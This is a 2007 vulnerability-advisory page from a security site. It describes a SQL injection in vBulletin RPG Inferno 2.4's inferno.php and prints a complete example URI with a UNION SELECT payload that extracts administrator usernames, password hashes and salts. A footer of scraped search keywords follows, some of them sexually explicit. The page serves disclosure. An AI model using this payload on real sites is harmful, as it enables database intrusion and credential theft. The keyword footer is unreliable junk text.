about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Inferno Technologies VBulletin RPG Inferno Inferno.PHP SQL Injection Vulnerability


Title Inferno Technologies VBulletin RPG Inferno Inferno.PHP SQL Injection Vulnerability
Published 2007-07-10-12:00AM
Updated 2008-03-20-01:50PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  t0pP8uZz & xprog are credited with the discovery of this vulnerability.
Vulnerable  Inferno Technologies vBulletin RPG Inferno 2.4
Not Vulnerable  
Code  No exploit is required. An example URI has been provided: http://www.example.com/forum/inferno.php?do=ScanMember&id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(username,0x3a,password,0x3a,salt),31,@@version,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/user/**/where/**/usergroupid=6/**/limit/**/0,1/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 28 Nov 2009 20:25:28 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.hali-p 200 /compo www.doodth kernel 2.4 jpeg vulne Shakeela a Tamil acte Cewe bogel ass crunch bangbros.c xoops wf l .wwwjavon. image sxe www.dogsex rss feeds chinasex.c Www.EvilTa POURN SEX Microsoft www shakee news for c papasmurf cartoons h www.cg.yu mambo Remo Www.romani timemanage www.homeok http:/miss madonasex mygallery/ IPB 4.0.0 msodatasou 89sex.com www.92copy www.mxdzsb 200 /compo I agree wi cih Cubecart news for c www.92copy www.3chk.c www.b533.c giarls free sexy mambo Remo www.20bjw. www.zuik8. Sneha pict